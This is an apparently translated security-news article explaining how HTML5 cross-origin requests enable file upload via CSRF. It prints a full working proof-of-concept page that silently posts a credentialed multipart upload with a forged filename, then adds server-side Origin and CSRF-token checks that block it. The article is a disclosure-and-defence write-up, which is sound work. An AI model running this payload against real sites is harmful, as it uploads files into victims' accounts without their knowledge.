Using a CSRF vulnerability to upload files - Vulnerability Alert - 黑吧安全网 (myhack58)

2013-11-22T00:00:00
ID MYHACK58:62201341246
Type myhack58
Reporter Anonymous (佚名)
Modified 2013-11-22T00:00:00

Description

It is well known that uploading a file through ordinary CSRF is not straightforward. The problem is that the data a forged form submits differs slightly from what the browser sends for a real file upload: the upload request carries a filename parameter:

    -----------------------------256672629917035
    Content-Disposition: form-data; name="file"; filename="test2.txt"
    Content-Type: text/plain

    test3
    -----------------------------256672629917035

If we build a form and submit it, the request above cannot be reproduced with the filename parameter, because that parameter is generated automatically by the browser's file input. This is what stopped malicious hackers from uploading files via CSRF. Since the arrival of HTML5, however, everything is different.

HTML5 brought a new feature called cross-origin resource sharing (CORS, http://www.w3.org/TR/cors/). In the past, because of the same-origin policy, an attacker had no way to reach another domain through JavaScript. Considering how rampant XSS is, the same-origin policy genuinely made our lives safer. With HTML5 cross-origin resource sharing, however, JavaScript can send a cross-domain request that contains a legitimate filename attribute. Note that a multipart/form-data POST counts as a "simple" CORS request: the browser sends it without a preflight and only withholds the response from the attacker's script, so the target server processes the upload whether or not it opts into CORS. As long as a user visits a malicious page, with no further interaction, a file can be uploaded via CSRF.

The following is a PoC generated by Burp Suite:

    <html>
    <!-- CSRF PoC - generated by Burp Suite Professional -->
    <body>
    <script>
    function submitRequest()
    {
      var xhr = new XMLHttpRequest();
      xhr.open("POST", "https://example.com/new_file.html", true);
      xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
      xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
      // multipart/form-data is a CORS-safelisted content type, so no preflight is sent
      xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035");
      // boolean, not the string "true": attach the victim's cookies to the cross-origin request
      xhr.withCredentials = true;
      // hand-built multipart body; the filename parameter is what a plain HTML form cannot forge
      var body = "-----------------------------256672629917035\r\n" +
        "Content-Disposition: form-data; name=\"message\"\r\n" +
        "\r\n" +
        "\r\n" +
        "-----------------------------256672629917035\r\n" +
        "Content-Disposition: form-data; name=\"backPage\"\r\n" +
        "\r\n" +
        "test\r\n" +
        "-----------------------------256672629917035\r\n" +
        "Content-Disposition: form-data; name=\"dataType\"\r\n" +
        "\r\n" +
        "test \r\n" +
        "-----------------------------256672629917035\r\n" +
        "Content-Disposition: form-data; name=\"file\"; filename=\"test2.txt\"\r\n" +
        "Content-Type: text/plain\r\n" +
        "\r\n" +
        "test3\r\n" +
        "-----------------------------256672629917035--\r\n";
      // send the body as raw bytes so the browser does not re-encode it or add its own boundary
      var aBody = new Uint8Array(body.length);
      for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
      xhr.send(new Blob([aBody]));
    }
    </script>
    <form action="#">
      <input type="submit" value="Submit request" onclick="submitRequest();" />
    </form>
    </body>
    </html>

Of course, the Submit button in the PoC is not required; the request can be sent automatically by JavaScript. To some extent the browser's most important protection, the same-origin policy, has been broken here. It is a sad thing.
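As an added example (not part of the original post or of Burp's output), here are the server-side checks that stop the PoC above: the browser stamps every cross-origin XHR with an Origin header the attacker's page can neither remove nor forge, and CORS keeps the attacker's script from reading the victim's session, so it cannot learn a per-session CSRF token placed in the upload form. Assumed names: SITE_ORIGIN, parseMultipart, isUploadAllowed, the hidden form field csrf_token, and the constructed sample requests; the Origin check assumes the site's own upload form always sends Origin, which current browsers do.

```javascript
const SITE_ORIGIN = "https://example.com";                       // the site owning the upload form
const BOUNDARY = "---------------------------256672629917035";   // same boundary as the PoC
// Parse a multipart/form-data body into parts {name, filename, data}.
function parseMultipart(body, contentType) {
  const m = /boundary=(.+)$/.exec(contentType);
  if (!m) return [];
  const delim = "--" + m[1].trim();
  const parts = [];
  for (const chunk of body.split(delim)) {
    const sep = chunk.indexOf("\r\n\r\n");
    if (sep < 0) continue;                       // preamble or the closing "--" chunk
    const head = chunk.slice(0, sep);
    const name = /; name="([^"]*)"/.exec(head);
    const file = /filename="([^"]*)"/.exec(head);
    if (!name) continue;
    parts.push({ name: name[1], filename: file ? file[1] : null,
                 data: chunk.slice(sep + 4).replace(/\r\n$/, "") });
  }
  return parts;
}

// Decide whether an upload may be processed. req = {headers, body} with lower-cased
// header names; sessionToken is the CSRF token issued to this user's session.
function isUploadAllowed(req, sessionToken) {
  const h = req.headers;
  // Every cross-origin XHR carries an Origin header the attacker cannot forge or
  // strip; anything other than our own origin is refused before the body is parsed.
  if (h.origin !== SITE_ORIGIN) return { ok: false, reason: "bad origin" };
  const parts = parseMultipart(req.body, h["content-type"] || "");
  // CORS hides the response from the attacker's script, so it cannot learn the
  // victim's token; the per-session token is an independent second check.
  const token = parts.find(p => p.name === "csrf_token");
  if (!token || token.data !== sessionToken) return { ok: false, reason: "bad token" };
  const file = parts.find(p => p.filename !== null);
  if (!file) return { ok: false, reason: "no file" };
  return { ok: true, filename: file.filename, size: file.data.length };
}

// Constructed sample requests, built the same way the PoC builds its body.
function buildBody(fields) {
  return fields.map(([name, value, filename]) => {
    const extra = filename ? `; filename="${filename}"\r\nContent-Type: text/plain` : "";
    return `--${BOUNDARY}\r\nContent-Disposition: form-data; name="${name}"${extra}\r\n\r\n${value}\r\n`;
  }).join("") + `--${BOUNDARY}--\r\n`;
}
const CT = "multipart/form-data; boundary=" + BOUNDARY;
const forgedReq = { headers: { origin: "https://attacker.invalid", "content-type": CT },
  body: buildBody([["message", ""], ["file", "test3", "test2.txt"]]) };   // the PoC's request
const genuineReq = { headers: { origin: SITE_ORIGIN, "content-type": CT },
  body: buildBody([["csrf_token", "tok-123"], ["file", "test3", "test2.txt"]]) };
```

Either check alone defeats the PoC; keeping both means a misconfigured proxy that drops Origin, or a token leak, does not reopen the hole.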

Extended reading:

http://blog.kotowicz.net/2011/05/cross-domain-arbitrary-file-upload.html

http://blog.kotowicz.net/2011/04/how-to-upload-arbitrary-file-contents.html

https://developer.mozilla.org/en-US/docs/HTTP/Access_control_CORS?redirectlocale=en-US&redirectslug=HTTP_access_control

http://www.w3.org/TR/cors/

via: gerionsecurity.com; translated and compiled by litdg@FreeBuf